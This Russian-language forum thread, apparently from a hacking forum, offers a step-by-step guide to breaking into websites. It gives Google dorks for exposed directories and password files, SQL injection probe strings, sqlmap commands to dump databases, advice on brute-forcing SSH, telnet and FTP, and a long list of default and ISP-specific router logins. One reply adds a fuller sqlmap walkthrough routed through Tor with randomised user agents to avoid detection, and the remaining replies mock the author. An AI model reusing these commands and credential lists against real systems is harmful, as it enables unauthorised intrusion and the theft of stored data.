Настоящий взлом сайта (проверено и отработано!)

Настоящий взлом сайта (проверено и отработано!)  

  By: empty_username on 2018-01-03 15 ч.

Настоящий взлом сайта (проверено и отработано!)

Возможно вам будет что еще добавить или исправить я буду только рад критике (но только если на неё у вас есть основания по типу более достоверной информации). Статью опять же перенес с дургого форума (писал очень давно, а потому могут быть ошибки в меру неопытности).

Для начала нам потребуется стандартный набор софта.

  • sqlmap (программа для реализации уязвимости в базе данных sql)
    Сканер портов (можно любой)
    Брут shh, telnet, ftp (использую собственные)
    По желанию можно http/https анализатор подключить (для xss реализации уязвимостей)
    Пак сплоитов на роутеры (мало ли)

Шаг 1. Сбор информации.
Сначала с помощью гугла собираем инфу что лежит на поверхности при помощи дорков.
Вот дорк для поиска открытых файлов на сайте (так можно слить хайд если это форум) таким дорком легко можно найти софт что лежал на сервере.

site:"sitename.com" intitle:"Index of"

Следующий дорк поможет найти пароли сервера (именно сервера, НЕ сайта!)

site:"sitename.com" intitle:"index of /etc/" intext:"passwd"

Итак, сами пользовательские аккаунты определены в passwd. Системы Linux вдобавок к passwd содержат его файл-компаньон shadow. Он, в отличие от /etc/passwd, доступен для чтения только администратору (если умный админ) и содержит зашифрованную информацию о паролях.
Если мы нашли логин и пароль от аккаунта сервера мы переходим к реализации, а если нет, то мы продолжаем искать уязвимости.
Далее ищем страницы с использованием sql. Вот самые распространенные дорки.

site:"sitename.com" inurl:"php?id="
site:"sitename.com" inurl:"php?cat="
site:"sitename.com" inurl:"php?page="
site:"sitename.com" inurl:"php?type="

Так же можно заменить "php" на "asp", "html" и др. После этого все найденные страницы мы проверяем дописывая в конец и перед символом "&" следующие наборы символов (можно наугад, можно перебором).

'
' and '0'='0
) union all select [t] and (0=0
" union all select [t] and "0"="0

Можно найти и другие наборы символов, но взачастую если отсеяло это, то перебирать прийдется часами различные комбинации. Если нашли страницу ведущую себя странно при вводе этого, тогда переходим к эксплуатации, а если нет то переходим к крайним мерам!
Сканируем порты!
Порты которые мы сможем взломать.

21 - ftp этот порт используется для загрузки файлов (в нашем случае шелла)
22 - ssh этот порт используется что бы отдавать комманды серверу удаленно (взломаем порт - взломаем серв)
23 - telnet примерно похож на ssh (однако ssh можно использовать как тунели)
8080, 1080 - роутер тут все зависит от модели.

Шаг 2. Эксплуатация.
Если нашли по дорку:

site:"sitename.com" intitle:"Index of"

Четкой инструкции тут нет. Ищите ВСЕ что не ровно лежит! Там можно найти файлы с базами данных и серверный софт.
Если нашли по дорку:

site:"sitename.com" intitle:"index of /etc/" intext:"passwd"

Сначала следует расшифровать пароли в shadow (md5(unix) - шифр), потом ищите порты к которым можно приконнектиться с этими данными.
Если нашли страницу с sql следует запустить sql map с следующими данными:

-u "ссылка на уязвимую страницу" --dump-all --level=5 --risk=3 --threads=10 --drop-set-cookie -v 1

Это стандартные параметры которые обеспечат нам более высокий шанс взлома!
Если же мы нашли открытые порты стараемся пробрутить их соответствующей программой.
Если нашли порт роутера (такое тоже бывает (сам был сисадмином и мне запрещали закрывать этот порт от подключений не из локалки)) тогда вводим в браузер:

sitename.com:port

У вас по обыкновению запросит пароль.
Путь 1. Подбор.
Комбинации:

// default pairs
admin	<empty>
admin	admin
admin	1234
admin	password
Admin	Admin
<empty>	admin
root	<empty>
root	admin
root	root
root	public
admin	nimda
<empty>	root
<empty>	<empty>
support	<empty>
support	support
super	super
super	APR@xuniL

// ISP specific
admin	onlime
admin	mts
mts	mts
telecomadmin	admintelecom
mgts	mtsoao
kyivstar	kyivstar
admin	0508780503
telekom	telekom
superadmin	Is$uper@dmin
admin	dPZb4GJTu9
admin	2w4f6n8k

// more pairs
admin	1
admin	123
admin	0000
admin	00000000
admin	12345
admin	123456
admin	1234567
admin	12345678
admin	123456789
admin	1234567890
admin	qwerty
admin	beeline
admin	beeline2013
admin	iyeh
admin	ghbdtn
admin	admin225
admin	juklop
admin	free
admin	inet
admin	internet
admin	asus
admin	root
admin	ADMIN
admin	adsl
admin	adslroot
admin	adsladmin
admin	Ferum
admin	Ferrum
admin	FERUM
admin	FERRUM
admin	Kendalf9
admin	263297
admin	590152
admin	21232
admin	adn8pzszk
admin	amvqnekk
admin	biyshs9eq
admin	e2b81d_1
admin	Dkdk8e89
admin	flvbyctnb
admin	qweasdOP
admin	EbS2P8
admin	FhF8WS
admin	ZmqVfo
admin	ZmqVfo1
admin	ZmqVfo2
admin	ZmqVfo3
admin	ZmqVfo4
admin	ZmqVfoVPN
admin	ZmqVfoSIP
admin	ZmqVfoN1
admin	ZmqVfoN2
admin	ZmqVfoN3
admin	ZmqVfoN4
admin	9f4r5r79//
admin	rombik1
admin	airocon
admin	zyxel
adsl	realtek
osteam	5up
root	toor
ZXDSL	ZXDSL
<empty>	support

// Cisco pairs
<empty>	Cisco
Cisco	Cisco
<empty>	cisco
cisco	cisco
admin	default
admin	cisco
admin	changeme
<empty>	c
<empty>	cc
<empty>	Cisco router
<empty>	letmein
<empty>	_Cisco
enable	cisco
pnadmin	pnadmin
root	attack
root	Cisco

// user access
user	<empty>
user	user
<empty>	user

2 путь. Эксплоиты (все зависит от модели роутера и вашего набора).

Настоящий взлом сайта (проверено и отработано!)  

  By: Rogalik on 2018-01-03 20 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

Постеснялся бы.
Это не "настоящий взлом сайта", это беглый обзор двух популярных методов. По сути — единственного популярного метода, sql-инъекции, потому что паролей в /etc/password нынче нет, а прочитать /etc/shadow может только рут.

Но блин... Взялся рассказывать про sqlmap — расскажи больше одной строчки! Он умеет в Tor, например. Почему не упомянуть?
Почему не упомянуть хотя бы назначение тех параметров, которые используешь в этой строке?
Нахуя нам  --dump-all не глядя, например?

Допустим, нашли мы руками уязвимый параметр.
Заряжаем:

sqlmap -u https://example.com/index.php?id=1 --tor --random-agent --threads=10 --dbs

--tor  — вежливо просим sqlmap юзать Tor
--random-agent — так же вежливо просим юзать рандомный User-agent из списка в конфигах, список можно править по желанию, либо залать напрямую параметром --user-agent="тут, собственно, user-agent"
--threads=10 — количество потоков, смотрим по ситуации и каналу. Для работы через Tor 10, имхо, дохуя, но для примера сойдет.
--dbs — перечислить все видимые базы данных

Второй заход:

sqlmap -u https://example.com/index.php?id=1 --tor --random-agent --threads=10 -D example-db --tables

-D example-db  — выбрали конкретную базу из списка, дальше работаем с ней
--tables — отобразить все таблицы из этой базы

Третий:

sqlmap -u https://example.com/index.php?id=1 --tor --random-agent --threads=10 -D example-db -T example-table --dump

-T example-table — выбрали конкретную таблицу
--dump — и сдампили все записи из нее.

При желании, можно сначала посмотреть список колонок

--columns  

и выбрать из них только нужные

-C

Или даже вырезать ненужные колонки, если дампим таблицу ццеликом.

-X

И вообще, sqlmap --help, он умеет не только с базами работать. Да и затыков впроцессе, скорее всего, будет не один. Внимательно читаем вывод и отвечаем на вопросы sqlmap'а в процессе вдумчиво, а не наобум.


Скажи, почему в твоем "мануале" нет хотя бы этой инфы?

Ну и

empty_username пишет:

Брут shh, telnet, ftp (использую собственные)

Лолчто? Ты вчера пинг из скрипта запустить не смог, какие в сраку собственные брутфорсеры :lol:

Редактировался Rogalik (2018-01-03 20 ч.)


[email protected]
pgp.mit.eduPGP
Не стреляйте в пианиста! Он играет, как умеет.

Настоящий взлом сайта (проверено и отработано!)  

  By: empty_username on 2018-01-04 10 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

Rogalik пишет:

Лолчто? Ты вчера пинг из скрипта запустить не смог, какие в сраку собственные брутфорсеры :lol:

Прошу вспомнить факт, что темы написаны мной давно. На данный момент у меня немало собственного софта. Начиная от галимых если это можно так назвать спамеров, заканчивая ратником и брутфорсом. Могу скинуть скрины если вы мне не верите!

Настоящий взлом сайта (проверено и отработано!)  

  By: ЕУ on 2018-01-04 11 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

Эх, меня слёзы берут когда вижу таких вот хакеров. Даже ругаться бессмыслено, почтим ТСа минутой молчания...

Редактировался ЕУ (2018-01-04 11 ч.)


Я устал. Я мухожук.

Настоящий взлом сайта (проверено и отработано!)  

  By: empty_username on 2018-01-04 11 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

Однако благодарю за отзыв. В процессе редактирования следующих статей я учту ваши замечания. Я очень рад что решил перейти из белосети сюда. Там мои статьи, которые вы уже частично исправлеными видете, популярны и даже не поддаются критике (хотя сейчас я осознаю какой бред тогда писал). Думаю, я тут многому научусь.

Настоящий взлом сайта (проверено и отработано!)  

  By: sup3r on 2018-01-04 17 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

webkill вернулся в сеть и освоил даркнет?

Настоящий взлом сайта (проверено и отработано!)  

  By: Rogalik on 2018-01-05 01 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

empty_username пишет:

учту ваши замечания.
мои статьи, которые вы уже частично исправлеными видете, популярны и даже не поддаются критике
хотя  я бред тогда писал

No comments
:D


[email protected]
pgp.mit.eduPGP
Не стреляйте в пианиста! Он играет, как умеет.

Настоящий взлом сайта (проверено и отработано!)  

  By: Rogalik on 2018-01-05 01 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

empty_username, а это не твои статьи.
Ты их тупо спиздил, чтобы разместить тут.
Скажешь, нет?


[email protected]
pgp.mit.eduPGP
Не стреляйте в пианиста! Он играет, как умеет.

Настоящий взлом сайта (проверено и отработано!)  

  By: camshot on 2018-01-09 13 ч.

Re: Настоящий взлом сайта (проверено и отработано!)

Rogalik пишет:

empty_username, а это не твои статьи.
Ты их тупо спиздил, чтобы разместить тут.
Скажешь, нет?

Он это уже понял и покинул "чёрносеть" :D

Ну а вообще, "хакер", который пишет такие "замечательные" статьи, не умеет пользоваться поиском и разобраться в форуме, посмотреть что и где, плохой "хакер"


Человеку свойственно ошибаться, и он пользуется этим свойством часто и с удовольствием.